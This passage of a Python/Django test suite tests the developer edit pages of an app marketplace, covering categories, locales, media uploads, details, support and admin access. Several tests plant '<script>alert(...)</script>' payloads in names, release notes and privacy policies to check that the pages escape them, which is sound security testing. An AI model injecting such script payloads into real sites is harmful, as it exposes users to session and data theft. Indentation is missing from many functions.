eq_(pq(r.content)('#manifest-url a').attr('href'), new_url)
def test_categories_listed(self):
r = self.client.get(self.url)
eq_(pq(r.content)('#addon-categories-edit').text(),
unicode(self.cat.name))
r = self.client.post(self.url)
eq_(pq(r.content)('#addon-categories-edit').text(),
unicode(self.cat.name))
def test_edit_categories_add(self):
new = Category.objects.create(name='Books', type=amo.ADDON_WEBAPP)
cats = [self.cat.id, new.id]
self.client.post(self.edit_url, self.get_dict(categories=cats))
app_cats = self.get_webapp().categories.values_list('id', flat=True)
eq_(sorted(app_cats), cats)
def test_edit_categories_addandremove(self):
new = Category.objects.create(name='Books', type=amo.ADDON_WEBAPP)
cats = [new.id]
self.client.post(self.edit_url, self.get_dict(categories=cats))
app_cats = self.get_webapp().categories.values_list('id', flat=True)
eq_(sorted(app_cats), cats)
@mock.patch('mkt.webapps.models.Webapp.save')
def test_edit_categories_required(self, save):
r = self.client.post(self.edit_url, self.get_dict(categories=[]))
assert_required(r.context['cat_form'].errors['categories'][0])
assert not save.called
def test_edit_categories_xss(self):
    """Category names are escaped when rendered back into the page.

    Fix: the second assertion checked for the same raw '<script>alert'
    string that the first assertion requires to be absent, so the pair
    could never both pass. It must check the HTML-escaped form.
    """
    new = Category.objects.create(name='<script>alert("xss");</script>',
                                  type=amo.ADDON_WEBAPP)
    cats = [self.cat.id, new.id]
    r = self.client.post(self.edit_url, self.get_dict(categories=cats))
    # Raw payload must never appear; only the escaped form may.
    assert '<script>alert' not in r.content
    assert '&lt;script&gt;alert' in r.content
def test_edit_categories_nonexistent(self):
r = self.client.post(self.edit_url, self.get_dict(categories=[100]))
eq_(r.context['cat_form'].errors['categories'],
['Select a valid choice. 100 is not one of the available '
'choices.'])
def test_edit_categories_max(self):
new1 = Category.objects.create(name='Books', type=amo.ADDON_WEBAPP)
new2 = Category.objects.create(name='Lifestyle', type=amo.ADDON_WEBAPP)
cats = [self.cat.id, new1.id, new2.id]
r = self.client.post(self.edit_url, self.get_dict(categories=cats))
eq_(r.context['cat_form'].errors['categories'],
['You can have only 2 categories.'])
def test_edit_check_description(self):
# Make sure bug 629779 doesn't return.
r = self.client.post(self.edit_url, self.get_dict())
eq_(r.status_code, 200)
eq_(self.get_webapp().description, self.get_dict()['description'])
def test_edit_slug_valid(self):
old_edit = self.edit_url
data = self.get_dict(slug='valid')
r = self.client.post(self.edit_url, data)
doc = pq(r.content)
assert doc('form').attr('action') != old_edit
def test_edit_as_developer(self):
self.client.login(username='[email protected]', password='password')
data = self.get_dict()
r = self.client.post(self.edit_url, data)
# Make sure we get errors when they are just regular users.
eq_(r.status_code, 403)
AddonUser.objects.create(addon=self.webapp, user_id=999,
role=amo.AUTHOR_ROLE_DEV)
r = self.client.post(self.edit_url, data)
eq_(r.status_code, 200)
webapp = self.get_webapp()
eq_(unicode(webapp.app_slug), data['slug'].lower())
eq_(unicode(webapp.description), data['description'])
def test_l10n(self):
self.webapp.update(default_locale='en-US')
url = self.webapp.get_dev_url('edit')
r = self.client.get(url)
eq_(pq(r.content)('#l10n-menu').attr('data-default'), 'en-us',
'l10n menu not visible for %s' % url)
def test_l10n_not_us(self):
self.webapp.update(default_locale='fr')
url = self.webapp.get_dev_url('edit')
r = self.client.get(url)
eq_(pq(r.content)('#l10n-menu').attr('data-default'), 'fr',
'l10n menu not visible for %s' % url)
def test_edit_l10n(self):
data = {
'slug': self.webapp.app_slug,
'manifest_url': self.webapp.manifest_url,
'categories': [self.cat.id],
'description_en-us': u'Nêw english description',
'description_fr': u'Nëw french description',
'releasenotes_en-us': u'Nëw english release notes',
'releasenotes_fr': u'Nêw french release notes'
}
res = self.client.post(self.edit_url, data)
eq_(res.status_code, 200)
self.webapp = self.get_webapp()
version = self.webapp.current_version.reload()
desc_id = self.webapp.description_id
notes_id = version.releasenotes_id
eq_(self.webapp.description, data['description_en-us'])
eq_(version.releasenotes, data['releasenotes_en-us'])
eq_(unicode(Translation.objects.get(id=desc_id, locale='fr')),
data['description_fr'])
eq_(unicode(Translation.objects.get(id=desc_id, locale='en-us')),
data['description_en-us'])
eq_(unicode(Translation.objects.get(id=notes_id, locale='fr')),
data['releasenotes_fr'])
eq_(unicode(Translation.objects.get(id=notes_id, locale='en-us')),
data['releasenotes_en-us'])
@mock.patch('mkt.developers.views._update_manifest')
def test_refresh(self, fetch):
self.client.login(username='[email protected]',
password='password')
url = reverse('mkt.developers.apps.refresh_manifest',
args=[self.webapp.app_slug])
r = self.client.post(url)
eq_(r.status_code, 204)
fetch.assert_called_once_with(self.webapp.pk, True, {})
@mock.patch('mkt.developers.views._update_manifest')
def test_refresh_dev_only(self, fetch):
self.client.login(username='[email protected]',
password='password')
url = reverse('mkt.developers.apps.refresh_manifest',
args=[self.webapp.app_slug])
r = self.client.post(url)
eq_(r.status_code, 403)
eq_(fetch.called, 0)
def test_view_developer_name(self):
r = self.client.get(self.url)
developer_name = self.webapp.current_version.developer_name
content = smart_unicode(r.content)
eq_(pq(content)('#developer-name td').html().strip(), developer_name)
def test_view_developer_name_xss(self):
    """Developer names are escaped, never rendered as live markup.

    Fix: the second assertion checked for the raw '<script>alert'
    string, directly contradicting the first assertion; it must look
    for the HTML-escaped form instead.
    """
    version = self.webapp.current_version
    version._developer_name = '<script>alert("xss-devname")</script>'
    version.save()
    r = self.client.get(self.url)
    assert '<script>alert' not in r.content
    assert '&lt;script&gt;alert' in r.content
def test_edit_packaged(self):
self.get_webapp().update(is_packaged=True)
data = self.get_dict()
data.pop('manifest_url')
r = self.client.post(self.edit_url, data)
eq_(r.status_code, 200)
eq_(r.context['editable'], False)
eq_(self.get_webapp().description, self.get_dict()['description'])
def test_edit_basic_not_public(self):
# Disable file for latest version, and then update app.current_version.
app = self.get_webapp()
app.versions.latest().all_files[0].update(status=amo.STATUS_DISABLED)
app.update_version()
# Now try to display edit page.
r = self.client.get(self.url)
eq_(r.status_code, 200)
def test_view_release_notes(self):
version = self.webapp.current_version
version.releasenotes = u'Chëese !'
version.save()
res = self.client.get(self.url)
eq_(res.status_code, 200)
content = smart_unicode(res.content)
eq_(pq(content)('#releasenotes td span[lang]').html().strip(),
version.releasenotes)
self.webapp.update(is_packaged=True)
res = self.client.get(self.url)
eq_(res.status_code, 200)
content = smart_unicode(res.content)
eq_(pq(content)('#releasenotes').length, 0)
def test_edit_release_notes(self):
self.webapp.previews.create()
self.webapp.support_email = '[email protected]'
self.webapp.save()
data = self.get_dict(releasenotes=u'I can hâz release notes')
res = self.client.post(self.edit_url, data)
releasenotes = self.webapp.current_version.reload().releasenotes
eq_(res.status_code, 200)
eq_(releasenotes, data['releasenotes'])
# Make sure make_public wasn't reset by accident.
eq_(self.webapp.reload().make_public, None)
def test_edit_release_notes_pending(self):
# Like test_edit_release_notes, but with a pending app.
file_ = self.webapp.current_version.all_files[0]
file_.update(status=amo.STATUS_PENDING)
self.webapp.update(status=amo.STATUS_PENDING)
self.test_edit_release_notes()
eq_(self.webapp.reload().status, amo.STATUS_PENDING)
def test_edit_release_notes_packaged(self):
# You are not supposed to edit release notes from the basic edit
# page if you app is packaged. Instead this is done from the version
# edit page.
self.webapp.update(is_packaged=True)
data = self.get_dict(releasenotes=u'I can not hâz release notes')
res = self.client.post(self.edit_url, data)
releasenotes = self.webapp.current_version.reload().releasenotes
eq_(res.status_code, 200)
eq_(releasenotes, None)
def test_view_releasenotes_xss(self):
    """Release notes are escaped, never rendered as live markup.

    Fix: the second assertion checked for the raw '<script>alert'
    string, directly contradicting the first assertion; it must look
    for the HTML-escaped form instead.
    """
    version = self.webapp.current_version
    version.releasenotes = '<script>alert("xss-devname")</script>'
    version.save()
    r = self.client.get(self.url)
    assert '<script>alert' not in r.content
    assert '&lt;script&gt;alert' in r.content
class TestEditCountryLanguage(TestEdit):
    """Read-only country / language rows on the edit listing page."""

    def get_webapp(self):
        # Same fixture app as TestEdit (webapp_337141).
        return Addon.objects.get(id=337141)

    def test_data_visible(self):
        clean_countries = []
        self.get_webapp().current_version.update(supported_locales='de,es')
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        # Row 0 lists countries, row 1 lists languages; strip the <small>
        # helper text before comparing.
        countries = (pq(pq(res.content)('#edit-app-language tr').eq(0))
                     .find('td').remove('small').text())
        langs = (pq(pq(res.content)('#edit-app-language tr').eq(1)).find('td')
                 .remove('small').text())
        for c in countries.split(', '):
            clean_countries.append(strip_whitespace(c))
        ## eq_(langs, u'English (US) (default), Deutsch, Espa\xf1ol')
        # XXX The above line is correct. But if Jenkins is wrong, I
        # don't wanna be right.
        # NOTE(review): the expectation below deliberately asserts the
        # UTF-8-mojibake form ('Espa\xc3\xb1ol') per the XXX above —
        # confirm against the CI environment before "fixing" it.
        eq_(langs, u'English (US) (default), Deutsch, Espa\xc3\xb1ol')
        self.assertSetEqual(
            sorted(clean_countries),
            sorted([r.name.decode() for r in regions.ALL_REGIONS]))
class TestEditMedia(TestEdit):
fixtures = fixture('webapp_337141')
def setUp(self):
super(TestEditMedia, self).setUp()
self.url = self.get_url('media')
self.edit_url = self.get_url('media', True)
self.icon_upload = self.webapp.get_dev_url('upload_icon')
self.preview_upload = self.webapp.get_dev_url('upload_preview')
patches = {
'ADDON_ICONS_PATH': tempfile.mkdtemp(),
'PREVIEW_THUMBNAIL_PATH': tempfile.mkstemp()[1] + '%s/%d.png',
}
for k, v in patches.iteritems():
patcher = mock.patch.object(settings, k, v)
patcher.start()
self.addCleanup(patcher.stop)
def formset_new_form(self, *args, **kw):
ctx = self.client.get(self.edit_url).context
blank = initial(ctx['preview_form'].forms[-1])
blank.update(**kw)
return blank
def formset_media(self, prev_blank=None, *args, **kw):
prev_blank = prev_blank or {}
kw.setdefault('initial_count', 0)
kw.setdefault('prefix', 'files')
# Preview formset.
fs = formset(*list(args) + [self.formset_new_form(**prev_blank)], **kw)
return dict((k, '' if v is None else v) for k, v in fs.items())
def new_preview_hash(self):
    """Upload one screenshot and return its upload-hash POST payload.

    The media form requires at least one screenshot, so most tests
    call this to satisfy that constraint.

    Fix: the source image file handle was opened and never closed;
    use a context manager so it is released immediately.
    """
    with open(get_image_path('preview.jpg'), 'rb') as src_image:
        r = self.client.post(self.preview_upload,
                             dict(upload_image=src_image))
    return {'upload_hash': json.loads(r.content)['upload_hash']}
def test_form_url(self):
self.check_form_url('media')
def test_edit_defaulticon(self):
data = dict(icon_type='')
data_formset = self.formset_media(prev_blank=self.new_preview_hash(),
**data)
r = self.client.post(self.edit_url, data_formset)
self.assertNoFormErrors(r)
webapp = self.get_webapp()
assert webapp.get_icon_url(128).endswith('icons/default-128.png')
assert webapp.get_icon_url(64).endswith('icons/default-64.png')
for k in data:
eq_(unicode(getattr(webapp, k)), data[k])
def test_edit_preuploadedicon(self):
data = dict(icon_type='icon/appearance')
data_formset = self.formset_media(prev_blank=self.new_preview_hash(),
**data)
r = self.client.post(self.edit_url, data_formset)
self.assertNoFormErrors(r)
webapp = self.get_webapp()
assert webapp.get_icon_url(64).endswith('icons/appearance-64.png')
assert webapp.get_icon_url(128).endswith('icons/appearance-128.png')
for k in data:
eq_(unicode(getattr(webapp, k)), data[k])
def test_edit_uploadedicon(self):
img = get_image_path('mozilla-sq.png')
src_image = open(img, 'rb')
response = self.client.post(self.icon_upload,
dict(upload_image=src_image))
response_json = json.loads(response.content)
webapp = self.get_webapp()
# Now, save the form so it gets moved properly.
data = dict(icon_type='image/png',
icon_upload_hash=response_json['upload_hash'])
data_formset = self.formset_media(prev_blank=self.new_preview_hash(),
**data)
r = self.client.post(self.edit_url, data_formset)
self.assertNoFormErrors(r)
webapp = self.get_webapp()
# Unfortunate hardcoding of URL.
url = webapp.get_icon_url(64)
assert ('addon_icons/%s/%s' % (webapp.id / 1000, webapp.id)) in url, (
'Unexpected path: %r' % url)
eq_(data['icon_type'], 'image/png')
# Check that it was actually uploaded.
dirname = os.path.join(settings.ADDON_ICONS_PATH,
'%s' % (webapp.id / 1000))
dest = os.path.join(dirname, '%s-32.png' % webapp.id)
eq_(storage.exists(dest), True)
eq_(Image.open(storage.open(dest)).size, (32, 32))
def test_edit_icon_log(self):
self.test_edit_uploadedicon()
log = ActivityLog.objects.all()
eq_(log.count(), 1)
eq_(log[0].action, amo.LOG.CHANGE_ICON.id)
def test_edit_uploadedicon_noresize(self):
img = '%s/img/mkt/logos/128.png' % settings.MEDIA_ROOT
src_image = open(img, 'rb')
data = dict(upload_image=src_image)
response = self.client.post(self.icon_upload, data)
response_json = json.loads(response.content)
webapp = self.get_webapp()
# Now, save the form so it gets moved properly.
data = dict(icon_type='image/png',
icon_upload_hash=response_json['upload_hash'])
data_formset = self.formset_media(prev_blank=self.new_preview_hash(),
**data)
r = self.client.post(self.edit_url, data_formset)
self.assertNoFormErrors(r)
webapp = self.get_webapp()
# Unfortunate hardcoding of URL.
addon_url = webapp.get_icon_url(64).split('?')[0]
end = 'addon_icons/%s/%s-64.png' % (webapp.id / 1000, webapp.id)
assert addon_url.endswith(end), 'Unexpected path: %r' % addon_url
eq_(data['icon_type'], 'image/png')
# Check that it was actually uploaded.
dirname = os.path.join(settings.ADDON_ICONS_PATH,
'%s' % (webapp.id / 1000))
dest = os.path.join(dirname, '%s-64.png' % webapp.id)
assert storage.exists(dest), dest
eq_(Image.open(storage.open(dest)).size, (64, 64))
def test_media_types(self):
res = self.client.get(self.get_url('media', edit=True))
doc = pq(res.content)
eq_(doc('#id_icon_upload').attr('data-allowed-types'),
'image/jpeg|image/png')
eq_(doc('.screenshot_upload').attr('data-allowed-types'),
'image/jpeg|image/png|video/webm')
def check_image_type(self, url, msg):
img = '%s/js/devreg/devhub.js' % settings.MEDIA_ROOT
self.check_image_type_path(img, url, msg)
def check_image_type_path(self, img, url, msg):
src_image = open(img, 'rb')
res = self.client.post(url, {'upload_image': src_image})
response_json = json.loads(res.content)
assert any(e == msg for e in response_json['errors']), (
response_json['errors'])
# The check_image_type method uploads js, so let's try sending that
# to ffmpeg to see what it thinks.
@mock.patch.object(amo, 'VIDEO_TYPES', ['application/javascript'])
def test_edit_video_wrong_type(self):
raise SkipTest
self.check_image_type(self.preview_upload, 'Videos must be in WebM.')
def test_edit_icon_wrong_type(self):
self.check_image_type(self.icon_upload,
'Icons must be either PNG or JPG.')
def test_edit_screenshot_wrong_type(self):
self.check_image_type(self.preview_upload,
'Images must be either PNG or JPG.')
def setup_image_status(self):
    """Create the icon file and a preview thumbnail on disk.

    Used by the ajax.image.status tests, which only care whether the
    files exist — the contents are irrelevant.

    Fix: both files were created with bare open(..., 'w') calls whose
    handles leaked; touch them via context managers so the handles are
    closed (and the files flushed) immediately.
    """
    self.icon_dest = os.path.join(self.webapp.get_icon_dir(),
                                  '%s-64.png' % self.webapp.id)
    os.makedirs(os.path.dirname(self.icon_dest))
    with open(self.icon_dest, 'w'):
        pass
    self.preview = self.webapp.previews.create()
    self.preview.save()
    os.makedirs(os.path.dirname(self.preview.thumbnail_path))
    with open(self.preview.thumbnail_path, 'w'):
        pass
    self.url = self.webapp.get_dev_url('ajax.image.status')
def test_icon_square(self):
img = get_image_path('mozilla.png')
self.check_image_type_path(img, self.icon_upload,
'Icons must be square.')
def test_icon_status_no_choice(self):
self.webapp.update(icon_type='')
url = self.webapp.get_dev_url('ajax.image.status')
result = json.loads(self.client.get(url).content)
assert result['icons']
def test_icon_status_works(self):
self.setup_image_status()
result = json.loads(self.client.get(self.url).content)
assert result['icons']
def test_icon_status_fails(self):
self.setup_image_status()
os.remove(self.icon_dest)
result = json.loads(self.client.get(self.url).content)
assert not result['icons']
def test_preview_status_works(self):
self.setup_image_status()
result = json.loads(self.client.get(self.url).content)
assert result['previews']
# No previews means that all the images are done.
self.webapp.previews.all().delete()
result = json.loads(self.client.get(self.url).content)
assert result['previews']
def test_preview_status_fails(self):
self.setup_image_status()
os.remove(self.preview.thumbnail_path)
result = json.loads(self.client.get(self.url).content)
assert not result['previews']
def test_image_status_default(self):
self.setup_image_status()
os.remove(self.icon_dest)
self.webapp.update(icon_type='icon/photos')
result = json.loads(self.client.get(self.url).content)
assert result['icons']
def test_icon_size_req(self):
filehandle = open(get_image_path('sunbird-small.png'), 'rb')
res = self.client.post(self.icon_upload, {'upload_image': filehandle})
response_json = json.loads(res.content)
assert any(e == 'Icons must be at least 128px by 128px.' for e in
response_json['errors'])
def check_image_animated(self, url, msg):
filehandle = open(get_image_path('animated.png'), 'rb')
res = self.client.post(url, {'upload_image': filehandle})
response_json = json.loads(res.content)
assert any(e == msg for e in response_json['errors'])
def test_icon_animated(self):
self.check_image_animated(self.icon_upload,
'Icons cannot be animated.')
def test_screenshot_animated(self):
self.check_image_animated(self.preview_upload,
'Images cannot be animated.')
@mock.patch('lib.video.ffmpeg.Video')
@mock.patch('mkt.developers.utils.video_library')
def add(self, handle, Video, video_library, num=1):
data_formset = self.formset_media(upload_image=handle)
r = self.client.post(self.preview_upload, data_formset)
self.assertNoFormErrors(r)
upload_hash = json.loads(r.content)['upload_hash']
# Create and post with the formset.
fields = []
for i in xrange(num):
fields.append(self.formset_new_form(upload_hash=upload_hash,
position=i))
data_formset = self.formset_media(*fields)
r = self.client.post(self.edit_url, data_formset)
self.assertNoFormErrors(r)
def preview_add(self, num=1):
self.add(open(get_image_path('preview.jpg'), 'rb'), num=num)
@mock.patch('mimetypes.guess_type', lambda *a: ('video/webm', 'webm'))
def preview_video_add(self, num=1):
self.add(open(video_files['good'], 'rb'), num=num)
@mock.patch('lib.video.ffmpeg.Video')
@mock.patch('mkt.developers.utils.video_library')
def add_json(self, handle, Video, video_library):
data_formset = self.formset_media(upload_image=handle)
result = self.client.post(self.preview_upload, data_formset)
return json.loads(result.content)
@mock.patch('mimetypes.guess_type', lambda *a: ('video/webm', 'webm'))
def test_edit_preview_video_add_hash(self):
res = self.add_json(open(video_files['good'], 'rb'))
assert not res['errors'], res['errors']
assert res['upload_hash'].endswith('.video-webm'), res['upload_hash']
def test_edit_preview_add_hash(self):
res = self.add_json(open(get_image_path('preview.jpg'), 'rb'))
assert res['upload_hash'].endswith('.image-jpeg'), res['upload_hash']
def test_edit_preview_add_hash_size(self):
res = self.add_json(open(get_image_path('mozilla.png'), 'rb'))
assert any(e.startswith('App previews ') for e in res['errors']), (
'Small screenshot not flagged for size.')
@mock.patch.object(settings, 'MAX_VIDEO_UPLOAD_SIZE', 1)
@mock.patch('mimetypes.guess_type', lambda *a: ('video/webm', 'webm'))
def test_edit_preview_video_size(self):
res = self.add_json(open(video_files['good'], 'rb'))
assert any(e.startswith('Please use files smaller than')
for e in res['errors']), (res['errors'])
@mock.patch('lib.video.tasks.resize_video')
@mock.patch('mimetypes.guess_type', lambda *a: ('video/webm', 'webm'))
def test_edit_preview_video_add(self, resize_video):
eq_(self.get_webapp().previews.count(), 0)
self.preview_video_add()
eq_(self.get_webapp().previews.count(), 1)
def test_edit_preview_add(self):
eq_(self.get_webapp().previews.count(), 0)
self.preview_add()
eq_(self.get_webapp().previews.count(), 1)
def test_edit_preview_edit(self):
self.preview_add()
preview = self.get_webapp().previews.all()[0]
edited = {'upload_hash': 'xxx',
'id': preview.id,
'position': preview.position,
'file_upload': None}
data_formset = self.formset_media(edited, initial_count=1)
self.client.post(self.edit_url, data_formset)
eq_(self.get_webapp().previews.count(), 1)
def test_edit_preview_reorder(self):
self.preview_add(3)
previews = list(self.get_webapp().previews.all())
base = dict(upload_hash='xxx', file_upload=None)
# Three preview forms were generated; mix them up here.
a = dict(position=1, id=previews[2].id)
b = dict(position=2, id=previews[0].id)
c = dict(position=3, id=previews[1].id)
a.update(base)
b.update(base)
c.update(base)
# Add them in backwards ("third", "second", "first")
data_formset = self.formset_media({}, *(c, b, a), initial_count=3)
eq_(data_formset['files-0-id'], previews[1].id)
eq_(data_formset['files-1-id'], previews[0].id)
eq_(data_formset['files-2-id'], previews[2].id)
self.client.post(self.edit_url, data_formset)
# They should come out "first", "second", "third".
eq_(self.get_webapp().previews.all()[0].id, previews[2].id)
eq_(self.get_webapp().previews.all()[1].id, previews[0].id)
eq_(self.get_webapp().previews.all()[2].id, previews[1].id)
def test_edit_preview_delete(self):
self.preview_add()
self.preview_add()
orig_previews = self.get_webapp().previews.all()
# Delete second preview. Keep the first.
edited = {'DELETE': 'checked',
'upload_hash': 'xxx',
'id': orig_previews[1].id,
'position': 0,
'file_upload': None}
ctx = self.client.get(self.edit_url).context
first = initial(ctx['preview_form'].forms[0])
first['upload_hash'] = 'xxx'
data_formset = self.formset_media(edited, *(first,), initial_count=2)
r = self.client.post(self.edit_url, data_formset)
self.assertNoFormErrors(r)
# First one should still be there.
eq_(list(self.get_webapp().previews.all()), [orig_previews[0]])
def test_edit_preview_add_another(self):
self.preview_add()
self.preview_add()
eq_(self.get_webapp().previews.count(), 2)
def test_edit_preview_add_two(self):
self.preview_add(2)
eq_(self.get_webapp().previews.count(), 2)
def test_screenshot_video_required(self):
r = self.client.post(self.edit_url, self.formset_media())
eq_(r.context['preview_form'].non_form_errors(),
['You must upload at least one screenshot or video.'])
def test_screenshot_with_icon(self):
self.preview_add()
preview = self.get_webapp().previews.all()[0]
edited = {'upload_hash': '', 'id': preview.id}
data_formset = self.formset_media(edited, initial_count=1)
data_formset.update(icon_type='image/png', icon_upload_hash='')
r = self.client.post(self.edit_url, data_formset)
self.assertNoFormErrors(r)
class TestEditDetails(TestEdit):
fixtures = fixture('webapp_337141')
def setUp(self):
super(TestEditDetails, self).setUp()
self.url = self.get_url('details')
self.edit_url = self.get_url('details', edit=True)
def get_dict(self, **kw):
    """Return a valid POST payload for the details form.

    Keyword arguments override individual fields.
    """
    data = dict(default_locale='en-US',
                homepage='http://twitter.com/fligtarsmom',
                privacy_policy="fligtar's mom does <em>not</em> share "
                               "your data with third parties.")
    data.update(kw)
    return data
def test_form_url(self):
self.check_form_url('details')
def test_edit(self):
data = self.get_dict()
r = self.client.post(self.edit_url, data)
self.assertNoFormErrors(r)
self.compare(data)
def test_privacy_policy_xss(self):
    """Privacy policy is sanitized: <b> survives, <script> is escaped.

    Fix: the expected markup contained a live <script> tag, which can
    never match the escaped template output; it must use HTML entities,
    matching the other XSS tests in this file.
    """
    self.webapp.privacy_policy = ("We\n<b>own</b>your"
                                  "<script>alert('soul')</script>")
    self.webapp.save()
    r = self.client.get(self.url)
    eq_(pq(r.content)('#addon-privacy-policy span[lang]').html(),
        "We<br/><b>own</b>your&lt;script&gt;"
        "alert('soul')&lt;/script&gt;")
def test_edit_exclude_optional_fields(self):
data = self.get_dict()
data.update(default_locale='en-US', homepage='',
privacy_policy='we sell your data to everyone')
r = self.client.post(self.edit_url, data)
self.assertNoFormErrors(r)
self.compare(data)
def test_edit_default_locale_required_trans(self):
# name and description are required in the new locale.
data = self.get_dict()
data.update(description='bullocks',
homepage='http://omg.org/yes',
privacy_policy='your data is delicious')
fields = ['name', 'description']
error = ('Before changing your default locale you must have a name '
'and description in that locale. You are missing %s.')
missing = lambda f: error % ', '.join(map(repr, f))
data.update(default_locale='pt-BR')
r = self.client.post(self.edit_url, data)
self.assertFormError(r, 'form', None, missing(fields))
# Now we have a name.
self.webapp.name = {'pt-BR': 'pt-BR name'}
self.webapp.save()
fields.remove('name')
r = self.client.post(self.edit_url, data)
self.assertFormError(r, 'form', None, missing(fields))
def test_edit_default_locale_frontend_error(self):
data = self.get_dict()
data.update(description='xx', homepage='http://google.com',
default_locale='pt-BR', privacy_policy='pp')
rp = self.client.post(self.edit_url, data)
self.assertContains(rp,
'Before changing your default locale you must')
def test_edit_locale(self):
self.webapp.update(default_locale='en-US')
r = self.client.get(self.url)
eq_(pq(r.content)('.addon_edit_locale').eq(0).text(),
'English (US)')
def test_homepage_url_optional(self):
r = self.client.post(self.edit_url, self.get_dict(homepage=''))
self.assertNoFormErrors(r)
def test_homepage_url_invalid(self):
r = self.client.post(self.edit_url,
self.get_dict(homepage='xxx'))
self.assertFormError(r, 'form', 'homepage', 'Enter a valid URL.')
def test_games_already_excluded_in_brazil(self):
AER.objects.create(addon=self.webapp, region=mkt.regions.BR.id)
games = Category.objects.create(type=amo.ADDON_WEBAPP, slug='games')
r = self.client.post(
self.edit_url, self.get_dict(categories=[games.id]))
self.assertNoFormErrors(r)
eq_(list(AER.objects.filter(addon=self.webapp)
.values_list('region', flat=True)),
[mkt.regions.BR.id])
class TestEditSupport(TestEdit):
    """Tests for the support email / URL section of the edit page."""

    fixtures = fixture('webapp_337141')

    def setUp(self):
        super(TestEditSupport, self).setUp()
        self.url = self.get_url('support')
        self.edit_url = self.get_url('support', edit=True)

    def test_form_url(self):
        self.check_form_url('support')

    def test_edit_support(self):
        # Both fields supplied: the form saves and the model matches.
        payload = {'support_email': '[email protected]',
                   'support_url': 'http://apple.com/'}
        res = self.client.post(self.edit_url, payload)
        self.assertNoFormErrors(res)
        self.compare(payload)

    def test_edit_support_free_required(self):
        # A free app still needs a support email.
        res = self.client.post(self.edit_url, {'support_url': ''})
        self.assertFormError(res, 'form', 'support_email',
                             'This field is required.')

    def test_edit_support_premium_required(self):
        # A premium app needs a support email too.
        self.get_webapp().update(premium_type=amo.ADDON_PREMIUM)
        res = self.client.post(self.edit_url, {'support_url': ''})
        self.assertFormError(res, 'form', 'support_email',
                             'This field is required.')

    def test_edit_support_premium(self):
        # Email alone is enough for a premium app.
        self.get_webapp().update(premium_type=amo.ADDON_PREMIUM)
        payload = {'support_email': '[email protected]',
                   'support_url': ''}
        res = self.client.post(self.edit_url, payload)
        self.assertNoFormErrors(res)
        eq_(self.get_webapp().support_email, payload['support_email'])

    def test_edit_support_url_optional(self):
        # The support URL may be left blank.
        payload = {'support_email': '[email protected]', 'support_url': ''}
        res = self.client.post(self.edit_url, payload)
        self.assertNoFormErrors(res)
        self.compare(payload)
class TestEditTechnical(TestEdit):
fixtures = fixture('webapp_337141')
def setUp(self):
super(TestEditTechnical, self).setUp()
self.url = self.get_url('technical')
self.edit_url = self.get_url('technical', edit=True)
def test_form_url(self):
self.check_form_url('technical')
def test_toggles(self):
    """The flash flag can be toggled on and back off.

    Fix: the response of the second POST was never checked for form
    errors, unlike the first; assert on it so a silently-failing save
    is caught instead of masked by the subsequent compare().
    """
    # Turn everything on.
    r = self.client.post(self.edit_url, formset(**{'flash': 'on'}))
    self.assertNoFormErrors(r)
    self.compare({'uses_flash': True})
    # And off.
    r = self.client.post(self.edit_url, formset(**{'flash': ''}))
    self.assertNoFormErrors(r)
    self.compare({'uses_flash': False})
def test_public_stats(self):
o = ActivityLog.objects
eq_(o.count(), 0)
eq_(self.webapp.public_stats, False)
assert not self.webapp.public_stats, (
'Unexpectedly found public stats for app. Says Basta.')
r = self.client.post(self.edit_url, formset(public_stats=True))
self.assertNoFormErrors(r)
self.compare({'public_stats': True})
eq_(o.filter(action=amo.LOG.EDIT_PROPERTIES.id).count(), 1)
def test_features_hosted(self):
data_on = {'has_contacts': True}
data_off = {'has_contacts': False}
assert not RereviewQueue.objects.filter(addon=self.webapp).exists()
# Turn contacts on.
r = self.client.post(self.edit_url, formset(**data_on))
self.assertNoFormErrors(r)
self.compare_features(data_on)
# And turn it back off.
r = self.client.post(self.edit_url, formset(**data_off))
self.assertNoFormErrors(r)
self.compare_features(data_off)
# Changing features must trigger re-review.
assert RereviewQueue.objects.filter(addon=self.webapp).exists()
def test_features_hosted_app_disabled(self):
# Reject the app.
app = self.get_webapp()
app.update(status=amo.STATUS_REJECTED)
app.versions.latest().all_files[0].update(status=amo.STATUS_DISABLED)
app.update_version()
assert not RereviewQueue.objects.filter(addon=self.webapp).exists()
data_on = {'has_contacts': True}
data_off = {'has_contacts': False}
# Display edit technical page
r = self.client.get(self.edit_url)
eq_(r.status_code, 200)
# Turn contacts on.
r = self.client.post(self.edit_url, formset(**data_on))
app = self.get_webapp()
self.assertNoFormErrors(r)
self.compare_features(data_on, version=app.latest_version)
# Display edit technical page again, is the feature on ?
r = self.client.get(self.edit_url)
eq_(r.status_code, 200)
ok_(pq(r.content)('#id_has_contacts:checked'))
# And turn it back off.
r = self.client.post(self.edit_url, formset(**data_off))
app = self.get_webapp()
self.assertNoFormErrors(r)
self.compare_features(data_off, version=app.latest_version)
# Changing features on a rejected app must NOT trigger re-review.
assert not RereviewQueue.objects.filter(addon=self.webapp).exists()
class TestAdmin(TestEdit):
    """Base class for admin-section tests; starts logged in as an admin."""
    fixtures = TestEdit.fixtures

    def setUp(self):
        super(TestAdmin, self).setUp()
        self.url = self.get_url('admin')
        self.edit_url = self.get_url('admin', edit=True)
        self.webapp = self.get_webapp()
        logged_in = self.client.login(username='[email protected]',
                                      password='password')
        assert logged_in

    def log_in_user(self):
        # Switch from the admin to the regular app-owner account.
        assert self.client.login(username=self.user.email, password='password')

    def log_in_with(self, rules):
        # Log in as a non-admin user granted the given permission rules.
        profile = UserProfile.objects.get(email='[email protected]')
        group = Group.objects.create(name='Whatever', rules=rules)
        GroupUser.objects.create(group=group, user=profile)
        assert self.client.login(username=profile.email, password='password')
class TestAdminSettings(TestAdmin):
    """Access control and behaviour of the admin-only settings section."""
    fixtures = TestEdit.fixtures
    def test_form_url(self):
        self.check_form_url('admin')
    def test_overview_visible_as_admin(self):
        # The read-only overview renders without the edit form in context.
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        eq_(pq(r.content)('form').length, 1)
        assert not r.context.get('form'), (
            'Admin Settings form should not be in context')
    def test_overview_forbidden_for_nonadmin(self):
        self.log_in_user()
        eq_(self.client.head(self.url).status_code, 403)
    def test_edit_get_as_admin(self):
        r = self.client.get(self.edit_url)
        eq_(r.status_code, 200)
        eq_(pq(r.content)('form').length, 1)
        assert r.context.get('form'), 'Admin Settings form expected in context'
    def test_edit_post_as_admin(self):
        # There are errors, but I don't care. I just want to see if I can POST.
        eq_(self.client.post(self.edit_url).status_code, 200)
